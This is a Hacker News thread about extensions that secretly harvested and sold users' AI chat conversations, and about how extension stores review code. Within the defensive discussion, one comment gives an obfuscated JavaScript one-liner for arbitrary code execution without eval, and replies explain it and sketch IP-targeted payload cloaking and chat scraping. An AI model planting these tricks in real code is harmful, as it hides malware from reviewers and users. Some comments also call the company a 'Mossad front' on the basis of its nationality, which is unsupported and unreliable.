8M users' AI conversations sold for profit by "privacy" extensions
816 points
1 day ago
| 62 comments
| koi.ai
| HN
GeekyBear
1 day ago
[-]
I stick to extensions that Mozilla has manually vetted as part of the Firefox recommended extensions program.

> Firefox is committed to helping protect you against third-party software that may inadvertently compromise your data – or worse – breach your privacy with malicious intent. Before an extension receives Recommended status, it undergoes rigorous technical review by staff security experts.

https://support.mozilla.org/en-US/kb/recommended-extensions-...

I know that Google hates to pay human beings, but this is an area that needs human eyes on code, not just automated scans.

reply
Santosh83
1 day ago
[-]
Yeah, IT pros and tech-aware "power" users can always take these measures, but the very availability of poorly or maliciously coded extensions and apps in popular app stores makes it a problem, considering normies will get swayed by the swanky features the software promises and will click past all misgivings and warnings. Social engineering attacks are impossible to prevent using technical means alone. Either a critical mass of ordinary people needs to become more safety/privacy conscious, or general-purpose computing devices will become more and more niche, as the very industry which creates these problems in the first place through poor review will also sell the solution of universal thin clients and locked-down devices, of course with the very happy cooperation of govts everywhere.
reply
Terr_
1 day ago
[-]
> I stick to extensions that Mozilla has manually vetted as part of the Firefox recommended extensions program.

If you're feeling extra-paranoid, the XPI file can be unpacked (it's a ZIP) so you can check over the code for anything suspicious or unreasonably complex, particularly if the browser extension is supposed to be something simple like "move the up/down vote arrows further apart on HN". :P

While that doesn't solve the overall ecosystem issue, every little bit helps. You'll know it's time to run away if extensions become closed-source blobs.

reply
insin
1 day ago
[-]
You can also, more conveniently, plug an extension's URL into this viewer:

https://robwu.nl/crxviewer/

reply
Y_Y
1 day ago
[-]
Now I have to trust that the viewer doesn't hide the malicious code, and that my browser doesn't either (presumably via an existing untrustworthy extension)
reply
tetris11
13 hours ago
[-]
It'd have to be adept at spotting it in all its forms first in order to hide it, which seems expensive for a free viewer
reply
dvratil
1 day ago
[-]
The question is, does Mozilla rigorously review every single update of every featured extension? Or did they just vet it once, so a malicious developer could now introduce data collection or similar "features" through a minor update of the extension and keep enjoying the "recommended" badge from Mozilla?
reply
tuetuopay
1 day ago
[-]
This may also be the reason for the extension being "Featured" on the Chrome Web Store: Google vetted it once, and didn't think about it again for each update.
reply
GeekyBear
1 day ago
[-]
> The question is, does Mozilla rigorously review every single update of every featured extension?

Yes.

reply
pacifika
1 day ago
[-]
This is just spreading FUD where an answer could have been provided.

> Before an extension receives Recommended status, it undergoes rigorous technical review by staff security experts.

https://support.mozilla.org/en-US/kb/recommended-extensions-...

reply
nevon
1 day ago
[-]
That link doesn't answer the question though. It states that the extension is reviewed before receiving the recommended status. It does not state that updates are reviewed.
reply
insin
1 day ago
[-]
They do, and it takes longer for updates to Recommended extensions to be reviewed as a result.

This is what the Firefox add-ons team sent to me when one of my extensions was invited to the Recommended program:

> If you’re interested in Control Panel for Twitter becoming a Firefox Recommended Extension there are a couple of conditions to consider:

> 1) Mozilla staff security experts manually review every new submission of all Recommended extensions; this ensures all Recommended extensions remain compliant with AMO’s privacy and security standards. Due to this rigorous monitoring you can expect slightly longer review wait times for new version submissions (up to two weeks in some cases, though it’s usually just a few days).

> 2) Developers agree to actively maintain their Recommended extension (i.e. make timely bug fixes and/or generally tend to its ongoing maintenance). Basically we don't want to include abandoned or otherwise decaying content, so if the day arrives you intend to no longer maintain Control Panel for Twitter, we simply ask you to communicate that to us so we can plan for its removal from the program.

reply
nevon
1 day ago
[-]
That's great! They should put that on the website.
reply
londons_explore
1 day ago
[-]
The problem is most codebases are huge - millions of lines when you include all the libraries etc.

Often they're compiled from TypeScript etc., making manual review almost impossible.

And if you demand the developer send in the raw uncompiled stuff you have the difficulty of Google/Mozilla having to figure out how to compile an arbitrary project which could use custom compilers or compilation steps.

Remember that someone malicious won't hide their malicious code in main.ts... it's gonna be deep inside a chain of libraries (which they might control too, or might have vendored).

reply
londons_explore
1 day ago
[-]
For example, the following hidden anywhere in the codebase allows arbitrary code execution even under the most stringent JavaScript security policy (no eval etc):

I=c=>c.map?c[0]?c.reduce((a,b)=>a[b=I(b)]||a(b),self):c[1]:c

(How it works is left as an exercise for the reader)

The actual code to run can be delivered as an innocuous looking JavaScript array from some server, and potentially only delivered to one high value target.
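To make the parent's point concrete, here is that one-liner in runnable form - a sketch with `self` swapped for `globalThis` so it also runs outside a browser:

```javascript
// The gadget from the comment above, using globalThis instead of self
// so this sketch runs under Node as well as in a page (an adaptation,
// not the original):
const I = c => c.map ? c[0] ? c.reduce((a, b) => a[b = I(b)] || a(b), globalThis) : c[1] : c;

// Plain strings pass straight through; arrays walk properties starting
// from globalThis, calling the accumulated value whenever the property
// lookup comes back undefined. [0, x] acts as a "literal" escape: a
// falsy first element returns the second element untouched.
const out = I(["JSON", "stringify", [0, { x: 1 }]]);
console.log(out); // '{"x":1}'
```

Nothing here calls eval or Function, which is why static scanners and CSP-style policies don't flag it; the "program" is just a nested array that can arrive from any server.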

reply
ikekkdcjkfke
1 day ago
[-]
And the reason we can't put execution of non-declared code behind a permission is that one anal developer at Chrome thinks we shouldn't break existing sites, even though no serious site would do this and you could just show a permission popup with a triangle exclamation mark
reply
londons_explore
23 hours ago
[-]
That's what's great about this - it is an interpreter which allows the attacker to do absolutely anything, but no non-declared code is directly run.
reply
johnebgd
1 day ago
[-]
Users have largely been trained to click okay when asked to give permission without thinking.
reply
arein3
1 day ago
[-]
Let me ask gemini

Wow, it deconstructed it beautifully

A Concrete Example: imagine you pass this array to the function: ['alert', 'Hello World']. Here is the step-by-step execution:

  Initialization: The accumulator a starts as self (the window object).

  Iteration 1 (b = "alert"): I("alert") returns the string "alert".
  It tries a["alert"] (which is window["alert"]) and finds the alert
  function. The new accumulator a is the alert function.

  Iteration 2 (b = "Hello World"): I("Hello World") returns the string
  "Hello World". It tries a["Hello World"]; the alert function has no
  property named "Hello World", so this is undefined. The || operator
  moves to the right side, a(b), which executes alert("Hello World").

  Result: A browser popup appears.
reply
cj
1 day ago
[-]
Isn’t minified code banned from chrome extensions?
reply
electroly
1 day ago
[-]
Google allows minified extensions and doesn't require you to provide the original unminified source. I've never provided Google the real source code to my extension and they rubber-stamp every release. The Chrome Web Store is the wild west--you're on your own.

Mozilla allows minification but you're required to provide the original buildable source. Mozilla actually looks at the code and they reject updates all the time.

reply
cj
1 day ago
[-]
Obfuscation is banned. Minification is not.

https://blog.chromium.org/2018/10/trustworthy-chrome-extensi...

reply
sixtyj
1 day ago
[-]
Probably off topic: I once tried to find bad code in a WordPress theme. It was hidden so deeply and inconspicuously. The only thing that really helped was to do a diff.

In JS it can be much harder to find anything suspicious when the code is minified.

But back to Firefox: my house, my rules. So set some stricter rules for external developers that discourage the bad actors a little.

reply
sixtyj
1 day ago
[-]
When managers take up their positions, they must sign not only their employment contracts but also various codes of ethics and other documents.

When a survey was conducted on the misuse of finances and powers, it was found that managers who did not sign the code (because they had to study it and then "forgot" to do so) were more likely to cheat than those who actually signed the documents.

reply
j-bos
1 day ago
[-]
Funny enough, the article mentions this extension was manually reviewed: > A "Featured" badge from Google, meaning it had passed manual review and met what Google describes as "a high standard of user experience and design."
reply
megous
1 day ago
[-]
I at some point vetted the extensions for myself.

What I saw in the Mozilla extensions store was anything from minified code (what is this? it might have been useful on the web in the late 90's, but it surely isn't necessary in an extension, which doesn't download its code from anywhere), to full-on data stealing code (reported, and Mozilla removed it after 2 weeks or so).

I don't trust the review process one bit if they allow minified code in the store. For the same reason, "manual" review doesn't fill me with any extra warm feeling of confidence. I can look at minified code manually myself, but it's just gibberish, and suspicious code is much harder to discern.

Also, I just stopped using third party extensions, except for 2 (Violentmonkey, uBlock), so I no longer do reviews. I had a script that would extract the XPI into a git repository before an update, do a commit, and show me a diff.

A friendly extension store for security-conscious users would make it easy to review the source code of an extension before hitting install or update. This is some of the most security-sensitive code that exists in the browser.

reply
Llamamoe
1 day ago
[-]
> I know that Google hates to pay human beings, but this is an area that needs human eyes on code, not automated scans.

I think we need both human review and for somebody to create an antivirus engine for code that's on par with the heuristics of good AV programs.

You could probably do even better than that since you could actually execute the code, whole or piecewise, with debugging, tracing, coverage testing, fuzzing and so on.

reply
wzdd
1 day ago
[-]
The article states that Google has done the same for this extension as part of providing its "Featured" badge.
reply
jwr
1 day ago
[-]
The article says the extension has been "manually reviewed" by Google.
reply
tremon
1 day ago
[-]
...and we all know that Google never does anything "manually", so I'd take that with the appropriate serving of salt.
reply
alfiedotwtf
1 day ago
[-]
The same applies to code editor extensions!
reply
chmod775
1 day ago
[-]
The company behind this appears to be "real" and incorporated in Delaware.

> Urban Cyber Security INC

https://opencorporates.com/companies/us_de/5136044

https://www.urbancybersec.com/about-us/

I found two addresses:

> 1007 North Orange Street 4th floor Wilmington, DE 19801 US

> 510 5th Ave 3rd floor New York, NY 10036 United States

and even a phone number: +1 917-690-8380

https://www.manhattan-nyc.com/businesses/urban-cyber-securit...

They look really legitimate on the outside, to the point that there's a fair chance they're not aware what their extension is doing. Possibly they're "victim" of this as well.

reply
swatcoder
1 day ago
[-]
> They look really legitimate on the outside

If that looks *really legitimate* to you, then you might be easily scammed. I'm not saying they're not legitimate, but nothing that you shared is a strong signal of legitimacy.

It would take perhaps a few hundred dollars a month to maintain a business that looks exactly like this, and maybe a couple thousand to buy one that somebody else had aged ahead of time. You wouldn't have to have any actual operations. Just continuously filed corporate papers, a simple brochure website, and a couple of virtual office accounts in places so dense that people don't know the virtual address sites by heart.

Old advice, but be careful believing what you encounter on the internet!

reply
ch2026
1 day ago
[-]
https://www.manhattanvirtualoffice.com/

The NY address is a virtual office.

https://themillspace.com/wilmington/

The DE address is a virtual office plus coworking facility.

reply
azinman2
1 day ago
[-]
Wow the virtual office concept is so beyond shady. I wonder if there are any legitimate uses of it?
reply
ryanjshaw
1 day ago
[-]
Many:

You run a business from home but do not want to reveal your personal address to the world.

You are from a country that Stripe doesn't support but need to use their unique capabilities like Stripe Connect; then you might sign up for Stripe Atlas to incorporate in the USA so you can do business directly with Stripe. Your US business then needs a US physical address, i.e. a virtual office.

Etc

reply
nl
1 day ago
[-]
Virtual offices have been around forever and aren't really an indication of being shady necessarily.
reply
victorbjorklund
1 day ago
[-]
That you don't need an office if your company works remotely? Kind of overkill to have a whole office for a three-person company where everyone works remotely.
reply
SoftTalker
1 day ago
[-]
Some things still require a mailing address. PO Box isn't always acceptable. Do you want it to be one of your 3 people's houses? What if one moves?
reply
fc417fc802
23 hours ago
[-]
Obvious option would be the law firm handling your business license. But can we also take a minute to appreciate the absurdity of a PO box ever being deemed unacceptable? It literally exists for this exact purpose, and there are any number of "PO box except not a PO box" schemes out there due to this issue. It ought to be illegal to treat PO boxes differently IMO.
reply
SoftTalker
21 hours ago
[-]
Mainly they want an address where they can serve legal notice to you. You can't deliver that to a PO box; it has to be handed to someone at a physical address.
reply
Mistletoe
1 day ago
[-]
Amazing.
reply
Nevermark
1 day ago
[-]
> Urban VPN is operated by Urban Cyber Security Inc., which is affiliated with BiScience (B.I Science (2009) Ltd.), a data broker company.

> This company has been on researchers' radar before. Security researchers Wladimir Palant and John Tuckner at Secure Annex have previously documented BiScience's data collection practices. Their research established that:

> BiScience collects clickstream data (browsing history) from millions of users

> Data is tied to persistent device identifiers, enabling re-identification

> The company provides an SDK to third-party extension developers to collect and sell user data

> BiScience sells this data through products like AdClarity and Clickstream OS

> The identical AI harvesting functionality appears in seven other extensions from the same publisher, across both Chrome and Edge:

Hmm.

> They look really legitimate on the outside

Hmm, what, no.

We have a data collection company, thriving financially on the lack of privacy protections and the indiscriminate collection and collation of data, connected to eight data-siphoning "Violate Privacy Network" apps.

And those apps are free... which is seriously sketchy by default if you can't otherwise identify some obviously noble incentive for offering free services/candy to strangers.

Once is happenstance, twice is coincidence, three (or eight) times is enemy action.

The only thing that could possibly make this look any worse is discovering a connection to Facebook.

reply
mortarion
1 day ago
[-]
Israeli company. No doubt some Mossad front.
reply
weird-eye-issue
1 day ago
[-]
You can get a mailing address and phone number for like $15/mo. You can incorporate a US business for only a couple hundred dollars.
reply
bix6
1 day ago
[-]
Is the agent address real?

1000 N. WEST ST. STE. 1501, WILMINGTON, New Castle, DE, 19801

It almost matches this law firms address but not quite.

https://www.skjlaw.com/contact-us/

Brandywine Building 1000 N. West Street, Suite 1501 Wilmington DE 19801

reply
thayne
1 day ago
[-]
Being a real business doesn't necessarily mean they can be trusted. Real companies do shady stuff all the time.
reply
consp
1 day ago
[-]
This also works in reverse: shady companies do real business. While the reason might be different the end result is the same.
reply
throw310822
1 day ago
[-]
> Urban VPN is operated by Urban Cyber Security Inc., which is affiliated with BiScience (B.I Science (2009) Ltd.), a data broker company.

BiScience is an Israeli company.

reply
hnbad
1 day ago
[-]
Israel is the new Russia, I guess.
reply
elisbce
1 day ago
[-]
Judging from their website, all links eventually point to either the VPN extension download website or a signup link. I wouldn't be surprised if some nation-state supported APT is behind this shit.
reply
umrashrf
1 day ago
[-]
I am surprised, because Google's review team rejects half of my extensions and apps.

Sometimes things don't make sense to me, like how "Uber Driver app access background location and there is no way to change that from settings" - https://developer.apple.com/forums/thread/783227

reply
qwertox
1 day ago
[-]
If Google cared at all for their users, they'd tell WhatsApp not to require the Contacts permission just to add names to numbers when you don't share your Contacts with the app.

Or they'd tell WhatsApp to allow granting microphone permission for one single call, instead of requesting permanent microphone permissions. All apps that I know of respect the "Ask every time" flow - all except Meta's apps.

Google just doesn't care.

reply
uyzstvqs
1 day ago
[-]
That's all opinionated, and the latter is part of the OS, not WhatsApp. Not liking how an app works does not compare to an app exfiltrating data without your consent.
reply
qwertox
1 day ago
[-]
Let me explain: my WhatsApp has no privileges granted. So when a call comes in, which is a very rare thing, I get asked to grant the microphone permission. I grant it, but only for one time, and when Android hands focus back to WhatsApp, it won't just make use of the microphone but re-asks for microphone access, so you go into the permissions intent, but there it is already set to "only this time". Only if I change it to "while using the app" does it work, but that is not acceptable for me, because that background use is passive use which can access the microphone. This means that WhatsApp can enable the mic whenever it likes, which it cannot do if "only this time" is selected. But the app is against that. I do not know how they do this, but that is what happens.
reply
donohoe
1 day ago
[-]
They are not comparing it to the data issue. The original issue led to further conversation. It's a valid concern and they make a good point.
reply
josephg
1 day ago
[-]
I wish there was another button on those contact permission boxes which would tell the app you've granted permissions. But when they try to read your contacts, send them randomly generated junk. Fake phone numbers. Fake names.

Or even better, mix in some real names and phone numbers but change all the other details. I want data brokers to think I live in 8 different countries. I want my email address to show up for 50 different identities. Good luck sorting that out.

reply
marcellus23
1 day ago
[-]
I think what's going on there is that "While using" includes when a navigation app is running in the background, which is visible to the user (via e.g. a blue status bar pill). "Always" allows access even when it's not clear to the user that an app is running.

The developer documentation is actually pretty clear about this: https://developer.apple.com/documentation/bundleresources/ch...

reply
hnbad
1 day ago
[-]
This might be a case of app permissions just being poorly delineated. E.g. I've seen Android apps require "location data" access just because they want to connect over bluetooth or manage WiFi or something (not entirely sure which one it was specifically) because that is actually the same permission and the wording in the permission modal is misleading.
reply
naian
1 day ago
[-]
They are the same permission because you can guess the user’s location using Bluetooth and WiFi.
reply
jackfranklyn
1 day ago
[-]
The permissions model for browser extensions has always been backwards. You grant full access at install time, then cross your fingers that nothing changes in an update.

What we actually need is runtime permissions that fire when the extension tries to do something suspicious - like exfiltrating data to domains that aren't related to its stated function. iOS does this reasonably well for apps. Extensions should too.

The "Recommended" badge helps but it's a bandaid. If an extension needs "read and change all data on all websites" to work, maybe it shouldn't work.

reply
miguelspizza
16 hours ago
[-]
We actually have this with the permissions API. The issue is everyone just opts for longer approval times and less intrusive UX with manifest level permissions.

I agree though, runtime permissions should be the default
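As a concrete sketch of what that looks like, a Manifest V3 extension declares runtime-grantable permissions under the `optional_*` keys (the extension name and host pattern here are hypothetical):

```json
{
  "manifest_version": 3,
  "name": "example-extension",
  "version": "1.0",
  "permissions": ["storage"],
  "optional_permissions": ["tabs"],
  "optional_host_permissions": ["https://*/*"]
}
```

Nothing under the `optional_*` keys is granted at install time; the extension has to call `chrome.permissions.request(...)` from a user gesture, and the user sees a prompt at that moment instead of a blanket "read and change all your data" warning up front.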

reply
hnbad
1 day ago
[-]
A big problem is also that you can pretty much only grant permission for one specific site or for all sites, and which of the two you get very much depends on which option the extension uses.

For example there's no need for the "inject custom JS or CSS into websites" extensions to need permission to read and write data on every single website you visit. If you only want to use them to make a few specific sites more accessible to you that doesn't mean you're okay with them touching your online banking. Especially when most of these already let you define specific URLs or patterns each rule/script should apply to.

I understand that there are still vectors for data exfiltration when the same extension has permissions on two different sites and that "code injection as a service" is inherently risky (although cross-origin policies can already lock this down somewhat) but in 2025 I'd hope we could have a more granular permission model for browser extensions that actually supports sandboxing.

reply
valicord
1 day ago
[-]
You can grant access to a few specific sites (in chrome at least), it's just hidden in settings and you need to configure it manually.
reply
murillians
1 day ago
[-]
“ A few weeks ago, I was wrestling with a major life decision. Like I've grown used to doing, I opened Claude”

Is this where we’re at with AI?

reply
nacozarina
1 day ago
[-]
People used to cast lots to make major life decisions.

Putting a token predictor in the mix — especially one incapable of any actual understanding — seems like a natural evolution.

Absolved of burden of navigating our noisy, incomplete and dissonant thoughts, we can surrender ourselves to the oracle and just obey.

reply
lionkor
1 day ago
[-]
Yes, but it's incredibly dangerous when the operator of the token predictor can give you, personally, different behavior and can influence your decisions even more directly than before.
reply
nl
1 day ago
[-]
If this is surprising to you then your circle is fairly unusual.

For example, HBR recently reported that the number 1 use for ChatGPT is "Therapy/companionship"

https://archive.is/Y76c5

reply
meindnoch
1 day ago
[-]
Some people are incapable of internal thought. They have to verbalise/write down their thoughts so they can hear/read them back, and that's how they make progress. In a way, these people's brains do work like LLMs.
reply
ACCount37
1 day ago
[-]
There is no evidence whatsoever that having or not having inner monologue confers any advantages or disadvantages.

For all we know, it's just two paths the brain can take to arrive at the same destination.

reply
ga_to
1 day ago
[-]
The comment (at least my reading of it) did not cast any judgement on whether this was a good or bad thing.
reply
AlecSchueler
1 day ago
[-]
The response didn't suggest that it did.
reply
hxstroy2
1 day ago
[-]
It absolutely did. Seems like you may be an example of exactly what they're discussing, and it looks disadvantageous to me.
reply
AlecSchueler
13 hours ago
[-]
Maybe you want to argue your position before going straight to the ad hominem?
reply
SoftTalker
1 day ago
[-]
It does strike me as pretty crazy, but I'm at the other end of the spectrum, I almost never think about using an AI for anything. I've tried Claude I think, twice (it wasn't very helpful). The only other AI I've ever used are the "AI summaries" that Duck Duck Go sometimes shows at the top of its search results.
reply
Miraltar
1 day ago
[-]
Delegating life decisions to AI is obviously quite stupid, but it can really help lay out and question your thoughts, even if it's obviously biased.
reply
senordevnyc
1 day ago
[-]
I constantly use AI like this. For life decisions, for complicated logistics situations, for technical decisions and architectures, etc. I'm not having it make any decisions for me, I'm just talking through things with another entity who has a vast breadth of knowledge, and will almost always suggest a different angle or approach that I hadn't considered.

Here's an example of the kinds of things I've talked with ChatGPT about in the last few weeks:

- I'm moving to a new area and I share custody of my daughter, so this adds a lot of complications around logistics. Talked through all that.

- Had it research niche podcasts and youtube channels for advertising / sponsorship opportunities for my SaaS

- Talked through a really complex architecture decision that's a mix of technical info and big tradeoffs for cost and customer experience.

- Did some research and talked through options for buying two new vehicles for the upcoming move, and what kinds work best for use cases (which are complex)

- Lots and lots of discussions around complex tax planning for 2026 and beyond

Again, these models have vast knowledge, as well as access to search and other tools to gather up-to-date info and sift through it far faster than I can. Why wouldn't I talk through these things with them? In my experience, with a little guardrails ("double check this" or "search and verify that X..."), I'm finding it more trustworthy than most experts in those fields. For example, I've gotten all kinds of incorrect tax advice from CPAs. Sometimes ChatGPT is out of date, but it's generally pretty accurate around taxes ime, especially if I have it search to verify things.

reply
skywhopper
1 day ago
[-]
A certain type of person loves nothing more than to spill their guts to anyone who will listen. They don’t see their conversational partners as other equally aware entities—they are just a sounding board for whatever is in this person's head. So LLMs are incredibly appealing to these folks. LLMs never get tired or zone out or make snarky responses. Add in chatbots’ obsequious enabling, and these folks are instantly hooked.
reply
haar
1 day ago
[-]
Do you just mean external vs internal processing/thinking?
reply
2bird3
1 day ago
[-]
As someone who has witnessed BiScience tracking in the past, I am not surprised to hear that they might be involved in all this. They came up in the past when researchers investigated the Cyberhaven compromise [1][2]. Though the correlation might not all be there, it's kind of disappointing

[1] https://secureannex.com/blog/cyberhaven-extension-compromise.... [2] https://secureannex.com/blog/sclpfybn-moneitization-scheme/ (referenced in the article)

reply
mat_b
1 day ago
[-]
I don't understand why so many people are using / trusting VPNs

"Let us handle all your internet traffic.. you can trust us.. we're free!"

No thank you.

reply
akimbostrawman
1 day ago
[-]
ISPs are so heavily regulated that they will give any federal or government agency free access to future and past internet connection information that is directly tied to your real identity.

Meanwhile, reputable VPN providers like Mullvad offer their service without KYC and leave the feds empty-handed when they knock on their doors.

https://mullvad.net/en/blog/mullvad-vpn-was-subject-to-a-sea...

reply
Joker_vD
1 day ago
[-]
For the same reason you trust your ISP? It handles all your internet traffic; and depending on where you live, probably has government-mandated back doors, or is willing to cooperate with arbitrary requests from law-enforcement agencies.

That's why TLS exists, after all. All Internet traffic is wiretapped.

reply
Dylan16807
1 day ago
[-]
I'd be significantly more suspicious by default of ISPs that charge no money.

> That's why TLS exists, after all.

That protects you if you're using standard methods to connect. Installed software gets to bypass it.

reply
psychoslave
1 day ago
[-]
Well, if someone wants to cover a large set of psychological profiles, they can always have a full range of virtual brands, going from freemium+ to luxurious esthetics.

Maybe some

reply
Joker_vD
1 day ago
[-]
And that's why I, personally, rent a VPS, run "ssh -D 9010 myvps" in the background, and selectively point my browser at it via proxy.pac (other apps get socksified as needed; although some stubbornly resist it, sigh).

But it's cumbersome.

reply
silverwind
1 day ago
[-]
You should run VPN on your gateway instead.
reply
1718627440
1 day ago
[-]
Because I pay the ISP, it is heavily regulated, and they actually make a lot of money from being an ISP?
reply
bluepuma77
1 day ago
[-]
> I don't understand why so many people are using [Cloudflare].

> "Let us handle all your internet traffic.. you can trust us.. []"

TLS does not help when most Internet traffic passes through a single entity, which by default will use an edge TLS certificate and re-encrypt all data passing through, and so has plaintext visibility into all data transmitted.

reply
gkbrk
1 day ago
[-]
I have a contract with my ISP, I can know who runs the company and I can sue the company if they violate anything they promised.
reply
Joker_vD
1 day ago
[-]
Yeah, and in your contract with ISP you explicitly agree to file any lawsuit against them in small claims court only. Although you can probably go and complain to FCC about them?
reply
nrhrjrjrjtntbt
1 day ago
[-]
TLS doesn't hide IP addresses
reply
lodovic
1 day ago
[-]
The use case is people who are urged to view something that is blocked (torrent / adult / gambling). They want it now, and they don't want to get involved with some shady company that slaps on a 2-year contract and keeps extending it indefinitely. These people instead find a "free vpn" in the web store and decide to give it a try.

VPNs are just one example. How many chrome extensions do you have that you don't use all the time, like adblockers, cookie consent form handlers or dark mode?

reply
mat_b
1 day ago
[-]
Me personally? I'm using Firefox with EFF privacy badger. No others.
reply
SamDc73
1 day ago
[-]
A lot of people from poor countries, who can't access a lot of websites/services and also can't pay for a VPN, use these "free" VPNs.

But other than that I would never trust anything other than Mullvad/IVPN/ProtonVPN

reply
fragmede
1 day ago
[-]
Yeah, free VPNs are totally a problem, but there's TLS, so at least those users aren't getting their bank account information stolen.
reply
Egor3f
1 day ago
[-]
TLS works when the app is installed somewhere else, but not in the browser itself. The browser actually handles TLS termination.
reply
bsaul
1 day ago
[-]
Does TLS mean certificate pinning? Can't a VPN alter DNS queries to return a proxy website for your bank, using a forged certificate?
reply
bandrami
1 day ago
[-]
Only if you've added a signing certificate the VPN controls to your CA chain. But at that point they don't have to do anything as complicated as you described.
reply
notpushkin
1 day ago
[-]
TLS means “there’s a certificate”. Yeah, if a VPN/proxy can forge a certificate that the user’s browser would trust, it’s an issue.

But considering those are browser extensions, I think they can just inspect any traffic they want on the client side (if they can get such broad permissions approved, which is probably not too hard).
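To make the client-side point concrete, here's a minimal, hypothetical sketch of the kind of scraping a content script with broad permissions could do. The markup and the "chat-message" class name are invented; a real extension would read `document.body.innerHTML` directly.

```javascript
// Hypothetical sketch: pulling chat messages out of page markup.
// The "chat-message" class is invented for illustration.
function extractMessages(html) {
  const matches = [...html.matchAll(/<div class="chat-message">([^<]*)<\/div>/g)];
  return matches.map((m) => m[1].trim());
}

// In a real content script this would be document.body.innerHTML;
// here we use a static string so the sketch runs standalone.
const page =
  '<div class="chat-message">How do I treat condition X?</div>' +
  '<div class="chat-message">Here is what you can try...</div>';

console.log(extractMessages(page));
```

No TLS interception needed: by the time a content script runs, the browser has already decrypted everything.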

reply
bennydog224
1 day ago
[-]
Google needs to act on removing these extensions and doing more thorough code reviews. Reputability is everything, and extensions can be genuinely valuable (e.g. LastPass, or my own extension Ward)

There has to be a better system. Maybe a public extension safety directory?

reply
yetanotherjosh
1 day ago
[-]
I don't understand how code review would catch this. The extension advertises itself as an AI protection tool that monitors your AI interactions, and the code is basically consistent with the stated purpose. That it doesn't stop collecting data when you turn off the UI alerting is perhaps an inconsistency, but even that is debatable (is there a rule in Google's terms that says data collection is contingent on UI alerts being enabled?). I'm curious what workflow or decision tree you'd expect a code review process to follow here that results in this being rejected. The problem doesn't seem to be code related; it's policy related: what are they doing with the information, not whether the extension has code to collect it.
reply
johncolanduoni
1 day ago
[-]
I’m not sure there’s much more juice to squeeze here via automated or semi-automated means. They could perhaps be doing these kind of human-in-the-loop reviews themselves for all extensions that hit a certain install count, but that’s not a popular technique at Google.
reply
bennydog224
1 day ago
[-]
Chrome extension codebases are fairly basic, I think there's room to build an agentic code scanner for these, but the juice probably isn't worth the squeeze to justify for them $$$-wise. Manual reviews I agree are expensive and dicey.
reply
est
1 day ago
[-]
Google is doing code review on extensions?
reply
bennydog224
1 day ago
[-]
I’m not sure, but whenever I cut a new release I upload my extension code and it goes through a review period before they publish.
reply
H8crilA
1 day ago
[-]
Do you think Google wants to have the extensions system, given that this is how people block ads?
reply
Liquix
1 day ago
[-]
adblockers on chromium-based browsers were severely crippled by Manifest V3. they're fine with extensions (and apparently malware) as long as users can't effectively block their tracking/ads.
reply
Legend2440
1 day ago
[-]
Adblockers are still working fine though? I’m on chrome with ublock and I’m not seeing any ads.
reply
anonym29
1 day ago
[-]
you're not using ublock, you're using ublock lite. it cannot do dynamic filtering, script blocking, or url parameter removal, among other limitations.
reply
charcircuit
1 day ago
[-]
Why does that matter if he's not seeing ads? A severely crippled adblocker would mean you see ads during regular usage.

Additionally, Brave, a Chromium-based browser, has adblocking built into the browser itself, meaning it is not affected by WebExtension changes and does not require trusting an additional third party.

reply
ozgrakkurt
1 day ago
[-]
Tracking is also very important. Blocking scripts is very useful
reply
bennydog224
1 day ago
[-]
I wouldn’t be surprised if it goes away - it’s very “old Google”. We’re moving more towards walled gardens.
reply
bandrami
1 day ago
[-]
Is this even a problem that code review could find? Once they have your conversation data what happens then isn't part of the plug-in.
reply
bennydog224
1 day ago
[-]
You're not wrong, but one thing about scammy developers is they tend to be ballsy and not covert. The Koi blog covers all the egregious code specifically for exfilling LLM conversations. This stuff is a walking red flag if it was in a public commit/PR.
reply
wnevets
1 day ago
[-]
I thought manifest v3 was supposed to make chrome extensions secure?
reply
adrr
1 day ago
[-]
It's actually the reason they found it: the code was in the extension. Before Manifest V3, extensions could just load external scripts, and there was no way to tell what they were actually doing.
reply
g947o
1 day ago
[-]
> extensions could just load external scripts and there's no way you could tell what they were actually doing.

I do think security researchers would be able to figure out what scripts are downloaded and run.

Regardless, none of this seems to matter to end users whether the script is in the extension or external.

reply
reddozen
1 day ago
[-]
There's nothing stopping server-side logic: if request.ip != myvictim, serve no malicious payload.
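The pattern above, sketched in hypothetical form (IPs and payload names invented): the server decides per request whether to return anything malicious, so a reviewer scanning from a non-targeted IP only ever sees benign behavior.

```javascript
// Hypothetical server-side cloaking: only the targeted IP receives
// the malicious payload; everyone else (including reviewers) gets a stub.
function selectPayload(requestIp, victimIp) {
  if (requestIp !== victimIp) {
    return "// no-op"; // benign response for non-targets
  }
  return "exfiltrate(conversation);"; // real payload for the target
}

console.log(selectPayload("198.51.100.9", "203.0.113.7")); // benign
console.log(selectPayload("203.0.113.7", "203.0.113.7")); // malicious
```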
reply
johncolanduoni
1 day ago
[-]
Even if the extension isn’t malicious, it creates a new attack vector that can affect users. If whatever URL the script is remotely loaded from is compromised, now all users of that extension are vulnerable.
reply
creatonez
1 day ago
[-]
Wait, does that mean Manifest v3 is so neutered that it can't load a `<script>` tag into the page if an extension needed to?

If so, I feel like something that limited is hardly even a browser extension interface in the traditional sense.

reply
johncolanduoni
1 day ago
[-]
Most browser extensions don’t need to insert script tags that point to arbitrary URLs on the internet. You can inject scripts that are bundled with the extension (you don’t even need to use an actual script tag). This is one part of manifest v3 that I think was actually a good change - ad blockers don’t do this so I don’t think Google had an ulterior motive for this particular limitation.
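For illustration, a minimal Manifest V3 manifest along these lines: content scripts must reference files bundled in the extension package (here a hypothetical `bundled.js`); pointing at a remote URL is not allowed.

```json
{
  "manifest_version": 3,
  "name": "Example Extension",
  "version": "1.0",
  "content_scripts": [
    {
      "matches": ["<all_urls>"],
      "js": ["bundled.js"]
    }
  ]
}
```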
reply
moi2388
1 day ago
[-]
That is correct; you cannot inject external scripts. You can fetch data from a remote server and inject it through the content script, but the content and service worker code is known at review time.

So you can still do everything you could before, but it's not as hidden anymore

reply
tlogan
1 day ago
[-]
Let me ask you this way: How do you think they make money?
reply
PeterHolzwarth
1 day ago
[-]
I believe you may be missing the sarcasm of the post you are responding to.
reply
johncolanduoni
1 day ago
[-]
I’m here to inform you that you perhaps missed the second-order sarcasm of the post you responded to. Hopefully the chain ends here.
reply
CafeRacer
1 day ago
[-]
I am afraid you may have missed a third order of sarcasm. It's sometimes called Incepticasm.
reply
droopyEyelids
1 day ago
[-]
He may have understood it, but the feelings of anger about it are so overwhelming he had to post anyway, even if it didn't perfectly flow with the conversation.
reply
QuadrupleA
1 day ago
[-]
